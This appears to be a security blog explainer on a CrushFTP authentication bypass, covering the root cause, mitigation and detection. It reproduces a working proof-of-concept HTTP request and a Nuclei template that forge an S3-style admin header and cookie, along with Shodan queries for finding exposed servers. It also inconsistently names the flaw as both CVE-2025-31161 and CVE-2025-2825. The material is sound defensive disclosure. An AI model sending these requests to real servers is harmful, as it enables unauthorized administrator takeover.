CrushFTP Vulnerability CVE-2025-31161 Explained

Key Points

CVE-2025-31161 enables unauthenticated access to CrushFTP servers, leading to full system takeover.
Affects versions 10.0.0–10.8.3 and 11.0.0–11.3.0; patched in 10.8.4 and 11.3.1.
Exploited since March 30, 2025, targeting marketing, retail, and semiconductor sectors.
Immediate patching and DMZ mode recommended for mitigation.

NOTE: Much of this article’s information including the POC and detection template was sourced from ProjectDiscovery Blog – CrushFTP Authentication Bypass – Please make sure to check the original article out to support their excellent work.

Introduction

A critical flaw in CrushFTP, identified as CVE-2025-2825, is making waves in cybersecurity circles. This authentication bypass vulnerability allows attackers to take over servers without credentials—and it’s happening now. Here’s the rundown on what’s at stake and how to lock it down.

What’s the Vulnerability?

CVE-2025-2825 is a severe authentication bypass in CrushFTP, a versatile file transfer server. Rated at a CVSS score of 9.8, it’s a high-stakes issue: no login needed, low effort required, and full system control as the prize. It hits versions 10.0.0 to 10.8.3 and 11.0.0 to 11.3.0, with fixes rolled out in 10.8.4 and 11.3.1. The root? A flaw in S3 authentication that lets attackers pose as admins like “crushadmin” effortlessly.

How It’s Being Exploited

Attackers have been exploiting this since March 30, 2025, zeroing in on marketing, retail, and semiconductor industries. They’re using MeshAgent for remote access and Telegram malware for command-and-control. Shadowserver reports over 1,500 exposed servers, and CISA’s added it to their Known Exploited Vulnerabilities catalog—proof it’s a major threat.

Technical Breakdown

The issue lies in ServerSessionHTTP.java’s loginCheckHeaderAuth() method, which processes S3-style Authorization headers (e.g., AWS4-HMAC-SHA256 Credential=crushadmin/). A flag, lookup_user_pass, defaults to true unless a tilde (~) splits the username. This flag trickles down to UserTools.verify_user(), where true skips password checks entirely, granting instant admin access with a crafted HTTP request and CrushAuth cookie.

Mitigation Musts

Patch Now: Update to CrushFTP 10.8.4 or 11.3.1 immediately.
DMZ Mode: Can’t patch yet? Turn on DMZ to limit access.
Lock It Down: Restrict server access to trusted IPs and keep an eye on logs for strange logins or new accounts.
Extra Layer: Deploy IDS/IPS to spot suspicious traffic.

Spotting Trouble

Look out for:

Unauthorized “crushadmin” logins.
Unexpected new accounts.
MeshAgent, AnyDesk, or Telegram processes.
Odd traffic to Telegram endpoints.

The Fix

CrushFTP’s 11.3.1 patch sets s3_auth_lookup_password_supported to false, adds a security gate, and enforces proper password checks. No more easy wins for attackers.

Proof of Concept

Here’s the original PoC from ProjectDiscovery:

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

Source: ProjectDiscovery Blog – CrushFTP Authentication Bypass

Detection Tool

ProjectDiscovery’s Nuclei template for spotting vulnerable servers:

id: CVE-2025-2825

info:
  name: CrushFTP Authentication Bypass
  author: parthmalhotra,Ice3man,DhiyaneshDk,pdresearch
  severity: critical
  description: |
    CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.
  reference:
    - https://projectdiscovery.io/blog/crushftp-authentication-bypass/
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update    
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2825
    cwe-id: CWE-287
    epss-score: 0.00039
    epss-percentile: 0.08378
  metadata:
    max-request: 2
    vendor: crushftp
    product: crushftp
    shodan-query:
      - http.title:"CrushFTP WebInterface"
      - http.favicon.hash:-1022206565
      - http.html:"crushftp"
    fofa-query:
      - icon_hash="-1022206565"
      - title="CrushFTP WebInterface"
      - body="crushftp"
  tags: cve,cve2025,crushftp,unauth,auth-bypass,rce

variables:
  string_1: "{{rand_text_numeric(13)}}"
  string_2: "{{rand_text_alpha(28)}}"
  string_3: "{{rand_text_numeric(4)}}"

http:
  - raw:
      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
        Origin: {{RootURL}}
        Referer: {{RootURL}}/WebInterface/login.html
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip

      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
        Origin: {{RootURL}}
        Referer: {{RootURL}}/WebInterface/login.html
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<user_list_subitem>crushadmin</user_list_subitem>"

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200